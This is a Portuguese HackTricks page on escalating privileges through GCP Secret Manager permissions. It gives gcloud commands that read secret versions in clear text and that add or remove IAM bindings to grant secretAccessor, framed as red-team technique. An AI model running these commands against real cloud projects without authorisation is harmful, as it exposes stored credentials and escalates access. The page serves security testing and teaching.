GCP - Secretmanager Privesc

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

secretmanager

Para mais informações sobre secretmanager:

GCP - Secrets Manager Enum

secretmanager.versions.access

Isso dá acesso para ler os secrets do secret manager e talvez isso possa ajudar a escalar privielegs (dependendo de quais informações estão armazenadas dentro do secret):

Obter versão do secret em texto claro ```bash # Get clear-text of version 1 of secret: "" gcloud secrets versions access 1 --secret="" ```

Como isto é também uma técnica de post exploitation, pode ser encontrada em:

GCP - Secretmanager Post Exploitation

secretmanager.secrets.setIamPolicy

Isso lhe dá acesso para ler os secrets do secret manager, por exemplo usando:

Add IAM policy binding to secret ```bash gcloud secrets add-iam-policy-binding \ --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ``` Ou revogue políticas com: ```bash gcloud secrets remove-iam-policy-binding \ --member="serviceAccount:@.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ```

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks